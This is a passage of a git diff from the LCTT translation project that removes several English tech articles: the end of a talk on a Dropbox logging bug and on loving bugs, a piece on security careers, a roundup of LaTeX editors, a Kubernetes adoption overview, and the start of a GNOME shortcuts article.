The desktop client would generate logs. Those logs were compressed, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200.
|
||||
|
||||
If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size.
|
||||
|
||||
The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk.
|
||||
|
||||
The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones.
|
||||
|
||||
The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others.
|
||||
|
||||
Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200.
|
||||
|
||||
All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed.
|
||||
|
||||
### 📈
|
||||
|
||||
Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together.
|
||||
|
||||
Before these fixes, there were four things going on:
|
||||
|
||||
1. Log files were sent up starting with the oldest
|
||||
|
||||
2. Log files were deleted starting with the newest
|
||||
|
||||
3. If the server couldn’t decrypt a log file it would 500
|
||||
|
||||
4. If the client got a 500 it would stop sending logs
|
||||
|
||||
A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk.
|
||||
|
||||
The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again.
|
||||
|
||||
The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories.
|
||||
|
||||
### Our options
|
||||
|
||||
Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.)
|
||||
|
||||
The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the problem.
|
||||
|
||||
What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its dependencies too, and now you have two problems.
|
||||
|
||||
Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests? One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new.
|
||||
|
||||
The solution we hit on is one that’s been used at Dropbox on a number of different occasions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days.
|
||||
|
||||
### Know your system
|
||||
|
||||
The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through.
|
||||
|
||||
### Know your tools
|
||||
|
||||
The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget.
|
||||
|
||||
### Feature flags & server-side gating
|
||||
|
||||
The third lesson is for you if you’re writing a mobile or a desktop application: _You need server-side feature gating and server-side flags._ When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved.
|
||||
|
||||
This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about.
|
||||
|
||||
But the benefit – man, when you need it, you really need it.
|
||||
|
||||
# How to love bugs
|
||||
|
||||
I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset.
|
||||
|
||||
The psychologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort.
|
||||
|
||||
Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty.
|
||||
|
||||
[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].]
|
||||
|
||||
Findings about honesty:
|
||||
|
||||
> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest.
|
||||
|
||||
On effort:
|
||||
|
||||
> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.”
|
||||
|
||||
On responding to confusion:
|
||||
|
||||
> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused.
|
||||
|
||||
These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset.
|
||||
|
||||
### Love your bugs
|
||||
|
||||
I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I _love_ weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled was an accomplishment, and it was a good thing for them to have done that day.
|
||||
|
||||
As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude.
|
||||
|
||||
If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates.
|
||||
|
||||
### Obrigada!
|
||||
|
||||
My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there:
|
||||
|
||||
* Sasha Laundy
|
||||
|
||||
* Amy Hanlon
|
||||
|
||||
* Julia Evans
|
||||
|
||||
* Julian Cooper
|
||||
|
||||
* Raphael Passini Diniz and the rest of the Python Brasil organizing team
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://akaptur.com/blog/2017/11/12/love-your-bugs/
|
||||
|
||||
作者:[Allison Kaptur ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://akaptur.com/about/
|
||||
[1]:http://2017.pythonbrasil.org.br/#
|
||||
[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs
|
||||
[3]:http://www.pilot.com/
|
||||
[4]:http://www.dropbox.com/
|
||||
[5]:http://www.recurse.com/
|
||||
[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM
|
||||
[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/
|
@ -1,60 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
Security Jobs Are Hot: Get Trained and Get Noticed
|
||||
============================================================
|
||||
|
||||
![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
|
||||
The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1]
|
||||
|
||||
The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low.
|
||||
|
||||
### Security is the place to be
|
||||
|
||||
In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case.
|
||||
|
||||
In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage.
|
||||
|
||||
### Be fearless
|
||||
|
||||
Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future.
|
||||
|
||||
There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies in the proactive side of security: finding and eliminating vulnerabilities while maintaining or even improving the end-user experience.
|
||||
|
||||
### Growth is imminent
|
||||
|
||||
Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.
|
||||
|
||||
Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.
|
||||
|
||||
### Training and support
|
||||
|
||||
Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolves.
|
||||
|
||||
My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health.
|
||||
|
||||
### The end game
|
||||
|
||||
More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss.
|
||||
|
||||
Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute.
|
||||
|
||||
_[Download ][2]the full 2017 Open Source Jobs Report now._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
|
||||
|
||||
作者:[ BEN COLLEN][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/bencollen
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:http://bit.ly/2017OSSjobsreport
|
||||
[3]:https://www.linux.com/files/images/security-skillspng
|
||||
[4]:http://www.dice.com/
|
||||
[5]:http://cyberseek.org/index.html#about
|
||||
[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
|
||||
[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
|
@ -1,264 +0,0 @@
|
||||
10 Best LaTeX Editors For Linux
|
||||
======
|
||||
**Brief: Once you get over the learning curve, there is nothing like LaTex.
|
||||
Here are the best LaTex editors for Linux and other systems.**
|
||||
|
||||
## What is LaTeX?
|
||||
|
||||
[LaTeX][1] is a document preparation system. Unlike a plain text editor, you
|
||||
can't just write plain text using LaTeX editors. Here, you will have to
|
||||
utilize LaTeX commands in order to manage the content of the document.
|
||||
|
||||
![LaTex Sample][2]![LaTex Sample][3]
|
||||
|
||||
LaTex Editors are generally used to publish scientific research documents or
|
||||
books for academic purposes. Most importantly, LaTeX editors come in handy while
|
||||
dealing with a document containing complex Mathematical notations. Surely,
|
||||
LaTeX editors are fun to use. But, not that useful unless you have specific
|
||||
needs for a document.
|
||||
|
||||
## Why should you use LaTex?
|
||||
|
||||
Well, just like I previously mentioned, LaTeX editors are meant for specific
|
||||
purposes. You do not need to be a geek head in order to figure out the way to
|
||||
use LaTeX editors but it is not a productive solution for users who deal with
|
||||
basic text editors.
|
||||
|
||||
If you are looking to craft a document but you are not interested in spending
|
||||
time formatting the text, then LaTeX editors should be the one you should go
|
||||
for. With LaTeX editors, you just have to specify the type of document, and
|
||||
the text font and sizes will be taken care of accordingly. No wonder it is
|
||||
considered one of the [best open source tools for writers][4].
|
||||
|
||||
Do note that it isn't something automated, you will have to first learn LaTeX
|
||||
commands to let the editor handle the text formatting with precision.
|
||||
|
||||
## 10 Of The Best LaTeX Editors For Linux
|
||||
|
||||
Just for information, the list is not in any specific order. Editor at number
|
||||
three is not better than the editor at number seven.
|
||||
|
||||
### 1\. Lyx
|
||||
|
||||
![][2]
|
||||
|
||||
![][5]
|
||||
|
||||
Lyx is an open source LaTeX Editor. In other words, it is one of the best
|
||||
document processors available on the web. LyX helps you focus on the structure
|
||||
of the write-up, just as every LaTeX editor should and lets you forget about
|
||||
the word formatting. LyX would manage whatsoever depending on the type of
|
||||
document specified. You get to control a lot of stuff while you have it
|
||||
installed. The margins, headers/footers, spacing/indents, tables, and so on.
|
||||
|
||||
If you are into crafting scientific documents, research thesis, or similar,
|
||||
you will be delighted to experience Lyx's formula editor which should be a
|
||||
charm to use. LyX also includes a set of tutorials to get started without much
|
||||
of a hassle.
|
||||
|
||||
[Lyx][6]
|
||||
|
||||
### 2\. Texmaker
|
||||
|
||||
![][2]
|
||||
|
||||
![][7]
|
||||
|
||||
Texmaker is considered to be one of the best LaTeX editors for GNOME desktop
|
||||
environment. It presents a great user interface which results in a good user
|
||||
experience. It is also crowned to be one among the most useful LaTeX editor
|
||||
there is. If you perform PDF conversions often, you will find TeXmaker to be
|
||||
relatively faster than other LaTeX editors. You can take a look at a preview
|
||||
of what the final document would look like while you write. Also, one could
|
||||
observe the symbols being easy to reach when needed.
|
||||
|
||||
Texmaker also offers an extensive support for hotkeys configuration. Why not
|
||||
give it a try?
|
||||
|
||||
[Texmaker][8]
|
||||
|
||||
### 3\. TeXstudio
|
||||
|
||||
![][2]
|
||||
|
||||
![][9]
|
||||
|
||||
If you want a LaTeX editor which offers you a decent level of customizability
|
||||
along with an easy-to-use interface, then TeXstudio would be the perfect one
|
||||
to have installed. The UI is surely very simple but not clumsy. TeXstudio lets
|
||||
you highlight syntax, comes with an integrated viewer, lets you check the
|
||||
references and also bundles some other assistant tools.
|
||||
|
||||
It also supports some cool features like auto-completion, link overlay,
|
||||
bookmarks, multi-cursors, and so on - which makes writing a LaTeX document
|
||||
easier than ever before.
|
||||
|
||||
TeXstudio is actively maintained, which makes it a compelling choice for both
|
||||
novice users and advanced writers.
|
||||
|
||||
[TeXstudio][10]
|
||||
|
||||
### 4\. Gummi
|
||||
|
||||
![][2]
|
||||
|
||||
![][11]
|
||||
|
||||
Gummi is a very simple LaTeX editor based on the GTK+ toolkit. Well, you may
|
||||
not find a lot of fancy options here but if you are just starting out - Gummi
|
||||
will be our recommendation. It supports exporting the documents to PDF format,
|
||||
lets you highlight syntax, and helps you with some basic error checking
|
||||
functionalities. Though Gummi isn't actively maintained via GitHub, it works
|
||||
just fine.
|
||||
|
||||
[Gummi][12]
|
||||
|
||||
### 5\. TeXpen
|
||||
|
||||
![][2]
|
||||
|
||||
![][13]
|
||||
|
||||
TeXpen is yet another simplified tool to go with. You get the auto-completion
|
||||
functionality with this LaTeX editor. However, you may not find the user
|
||||
interface impressive. If you do not mind the UI, but want a super easy LaTeX
|
||||
editor, TeXpen could fulfill that wish for you. Also, TeXpen lets you
|
||||
correct/improve the English grammar and expressions used in the document.
|
||||
|
||||
[TeXpen][14]
|
||||
|
||||
### 6\. ShareLaTeX
|
||||
|
||||
![][2]
|
||||
|
||||
![][15]
|
||||
|
||||
ShareLaTeX is an online LaTeX editor. If you want someone (or a group of
|
||||
people) to collaborate on documents you are working on, this is what you need.
|
||||
|
||||
It offers a free plan along with several paid packages. Even the students of
|
||||
Harvard University & Oxford University utilize this for their projects. With
|
||||
the free plan, you get the ability to add one collaborator.
|
||||
|
||||
The paid packages let you sync the documents on GitHub and Dropbox along with
|
||||
the ability to record the full document history. You can choose to have
|
||||
multiple collaborators as per your plan. For students, there's a separate
|
||||
pricing plan available.
|
||||
|
||||
[ShareLaTeX][16]
|
||||
|
||||
### 7\. Overleaf
|
||||
|
||||
![][2]
|
||||
|
||||
![][17]
|
||||
|
||||
Overleaf is yet another online LaTeX editor. Similar to ShareLaTeX, it offers
|
||||
separate pricing plans for professionals and students. It also includes a free
|
||||
plan where you can sync with GitHub, check your revision history, and add
|
||||
multiple collaborators.
|
||||
|
||||
There's a limit on the number of files you can create per project - so it
|
||||
could bother if you are a professional working with LaTeX documents most of
|
||||
the time.
|
||||
|
||||
[Overleaf][18]
|
||||
|
||||
### 8\. Authorea
|
||||
|
||||
![][2]
|
||||
|
||||
![][19]
|
||||
|
||||
Authorea is a wonderful online LaTeX editor. However, it is not the best out
|
||||
there - when considering the pricing plans. For free, it offers just 100 MB of
|
||||
data upload limit and 1 private document at a time. The paid plans offer you
|
||||
more perks but it may not be the cheapest from the lot. The only reason you
|
||||
should choose Authorea is the user interface. If you love to work with a tool
|
||||
offering an impressive user interface, there's no looking back.
|
||||
|
||||
[Authorea][20]
|
||||
|
||||
### 9\. Papeeria
|
||||
|
||||
![][2]
|
||||
|
||||
![][21]
|
||||
|
||||
Papeeria is the cheapest LaTeX editor you can find on the Internet -
|
||||
considering it is as reliable as the others. You do not get private projects
|
||||
if you want to utilize it for free. But, if you prefer public projects it lets
|
||||
you work on an unlimited number of projects with numerous collaborators. It
|
||||
features a pretty simple plot builder and includes Git sync for no additional
|
||||
cost. If you opt for the paid plan, it will empower you with the ability to
|
||||
work on 10 private projects.
|
||||
|
||||
[Papeeria][22]
|
||||
|
||||
### 10\. Kile
|
||||
|
||||
![Kile LaTeX editor][2]
|
||||
|
||||
![Kile LaTeX editor][23]
|
||||
|
||||
The last entry in our list of best LaTeX editors is Kile. Some people swear by
|
||||
Kile. Primarily because of the features it provides.
|
||||
|
||||
Kile is more than just an editor. It is an IDE tool like Eclipse that provides
|
||||
a complete environment to work on documents and projects. Apart from quick
|
||||
compilation and preview, you get features like auto-completion of commands,
|
||||
insert citations, organize document in chapters etc. You really have to use
|
||||
Kile to realize its true potential.
|
||||
|
||||
Kile is available for Linux and Windows.
|
||||
|
||||
[Kile][24]
|
||||
|
||||
### Wrapping Up
|
||||
|
||||
So, there go our recommendations for the LaTeX editors you should utilize on
|
||||
Ubuntu/Linux.
|
||||
|
||||
There are chances that we might have missed some interesting LaTeX editors
|
||||
available for Linux. If you happen to know about any, let us know down in the
|
||||
comments below.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/latex-editors-linux/
|
||||
|
||||
作者:[Ankush Das][a]
|
||||
译者:[翻译者ID](https://github.com/翻译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ankush/
|
||||
[1]:https://www.latex-project.org/
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/latex-sample-example.jpeg
|
||||
[4]:https://itsfoss.com/open-source-tools-writers/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/10/lyx_latex_editor.jpg
|
||||
[6]:https://www.lyx.org/
|
||||
[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_latex_editor.jpg
|
||||
[8]:http://www.xm1math.net/texmaker/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_latex_editor.jpg
|
||||
[10]:https://www.texstudio.org/
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_latex_editor.jpg
|
||||
[12]:https://github.com/alexandervdm/gummi
|
||||
[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_latex_editor.jpg
|
||||
[14]:https://sourceforge.net/projects/texpen/
|
||||
[15]:https://itsfoss.com/wp-content/uploads/2017/10/sharelatex.jpg
|
||||
[16]:https://www.sharelatex.com/
|
||||
[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg
|
||||
[18]:https://www.overleaf.com/
|
||||
[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg
|
||||
[20]:https://www.authorea.com/
|
||||
[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_latex_editor.jpg
|
||||
[22]:https://www.papeeria.com/
|
||||
[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-latex-800x621.png
|
||||
[24]:https://kile.sourceforge.io/
|
@ -1,95 +0,0 @@
|
||||
translating by aiwhj
|
||||
|
||||
Adopting Kubernetes step by step
|
||||
============================================================
|
||||
|
||||
Why Docker and Kubernetes?
|
||||
|
||||
Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion.
|
||||
|
||||
Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner.
|
||||
|
||||
[Docker][1] — the containerization platform — provides this, making software _independent_ of cloud providers.
|
||||
|
||||
However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent.
|
||||
|
||||
This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes).
|
||||
|
||||
A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move your shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play.
|
||||
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
|
||||
Evolution to Kubernetes
|
||||
|
||||
With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from _development_ to _production_ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure.
|
||||
|
||||
The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline.
|
||||
|
||||
How do you work with Kubernetes?
|
||||
|
||||
With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information).
|
||||
|
||||
So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way?
|
||||
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
|
||||
Development with a local cluster
|
||||
|
||||
If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4].
|
||||
|
||||
A Kubernetes series
|
||||
|
||||
The Kubernetes series repository is open source and available here:
|
||||
|
||||
### [https://github.com/red-gate/ks][5]
|
||||
|
||||
We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database.
|
||||
|
||||
The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs _and_ have understood how best to cater for the database lifecycle in this world of containers and clusters.
|
||||
|
||||
Here are the first 5 episodes of this series:
|
||||
|
||||
1. ks1: build a React app with Kubernetes
|
||||
|
||||
2. ks2: make minikube detect React code changes
|
||||
|
||||
3. ks3: add a python web server that hosts an API
|
||||
|
||||
4. ks4: make minikube detect Python code changes
|
||||
|
||||
5. ks5: create a test environment
|
||||
|
||||
The second part of the series will add a database and try to work out the best way to evolve our application alongside it.
|
||||
|
||||
By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way.
|
||||
|
||||
What’s next?
|
||||
|
||||
We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes.
|
||||
|
||||
_This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6]
|
||||
|
||||
* * *
|
||||
|
||||
_We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
|
||||
|
||||
作者:[santiago arias][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.com/@santiaago?source=post_header_lockup
|
||||
[1]:https://www.docker.com/what-docker
|
||||
[2]:https://kubernetes.io/
|
||||
[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM
|
||||
[4]:https://kubernetes.io/docs/concepts/storage/volumes/
|
||||
[5]:https://github.com/red-gate/ks
|
||||
[6]:mailto:foundry@red-gate.com
|
||||
[7]:https://www.red-gate.com/foundry/
|
||||
[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies
|
||||
[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge
|
@ -1,77 +0,0 @@
|
||||
Useful GNOME Shell Keyboard Shortcuts You Might Not Know About
|
||||
======
|
||||
As Ubuntu has moved to Gnome Shell in its 17.10 release, many users may be interested to discover some of the most useful shortcuts in Gnome as well as how to create your own shortcuts. This article will explain both.
